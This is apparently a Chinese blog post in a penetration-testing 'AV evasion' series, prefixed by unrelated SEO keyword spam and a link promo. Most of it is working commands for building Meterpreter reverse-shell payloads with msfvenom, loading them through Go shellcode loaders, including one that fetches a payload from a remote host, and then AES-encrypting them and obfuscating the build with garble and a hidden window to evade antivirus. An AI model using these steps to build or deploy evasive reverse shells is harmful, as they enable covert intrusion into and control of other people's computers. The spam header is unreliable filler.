织梦网站怎么做seo,建立一个网址需要多少钱,淘宝客如何做免费的网站,深圳龙华 网站建设全套完整笔记
渗透测试60w字全套md笔记#xff1a;夸克网盘分享
往期文章 WEB渗透免杀篇-免杀工具全集-CSDN博客 WEB渗透免杀篇-加载器免杀-CSDN博客 WEB渗透免杀篇-分块免杀-CSDN博客
WEB渗透免杀篇-Powershell免杀-CSDN博客
WEB渗透免杀篇-Python源码免杀-CSDN博客
…全套完整笔记
渗透测试60w字全套md笔记夸克网盘分享
往期文章 WEB渗透免杀篇-免杀工具全集-CSDN博客 WEB渗透免杀篇-加载器免杀-CSDN博客 WEB渗透免杀篇-分块免杀-CSDN博客
WEB渗透免杀篇-Powershell免杀-CSDN博客
WEB渗透免杀篇-Python源码免杀-CSDN博客
WEB渗透免杀篇-C#源码免杀-CSDN博客
WEB渗透免杀篇-MSFshellcode免杀-CSDN博客
WEB渗透免杀篇-MSF免杀-CSDN博客
WEB渗透免杀篇-Bypass-AMSI-CSDN博客
WEB渗透免杀篇-Golang免杀-CSDN博客
WEB渗透免杀篇-Pezor免杀-CSDN博客
WEB渗透免杀篇-cshot远程shellcode-CSDN博客 直接编译
生成
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST192.168.0.108 LPORT12138 -f c
代码转换成0x格式粘贴到go.txt中保存为go格式安装golang环境在shellcode目录执行
go build生成exe编码编译
https://github.com/biggerduck/RedTeamNotes/blob/main/%E5%88%A9%E7%94%A8go%E5%8A%A0%E8%BD%BDshellcode%E5%85%8D%E6%9D%80.pdf加载器
go-shellcode
https://github.com/brimstone/go-shellcode
进入cmd/sc目录编译sc.exe
go build生成
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST192.168.0.108 LPORT12138 -f hex -o shell.txt
加载器加载shellcode
sc.exe shellcodeGsl
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/gsl-sc-loader.zip
gsl -s SHELLCODE -hex msf生成hex格式
gsl -f shell.raw本地加载raw格式文件
gsl -f shell.hex -hex 本地加载hex格式文件
gsl -u http://192.168.0.108/1.raw 远程加载
gsl -u http://192.168.0.108/1.hexgo-shellcode-loader
https://github.com/HZzz2/go-shellcode-loader
git clone https://github.com/HZzz2/go-shellcode-loader.git
cd go-shellcode-loader
//下条命令安装第三方混淆库 GitHub地址https://github.com/burrowers/garble
go install mvdan.cc/garblelatest
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOSTx.x.x.x LPORT9999 -f raw rev.raw
base64 -w 0 -i rev.raw rev.bs64
cat rev.bs64复制到aes-sc.go中的51行替换payload 运行aes-sc.go生成AES加密后的值
go run aes-sc.go复制输出的值到go-sc.go中的73行替换payload 编译成exe可执行程序
garble -tiny -literals -seedrandom build -ldflags-w -s -H windowsgui -race go-sc.go参数解释 garble(混淆库) -tiny 删除额外信息 -literals 混淆文字 -seedrandom base64编码的随机种子 go -w 去掉调试信息不能gdb调试了 -s 去掉符号表 -H windowsgui 隐藏执行窗口不占用 cmd 终端。 被查杀率高 -race 使数据允许竞争检测 编译后得到go-sc.exe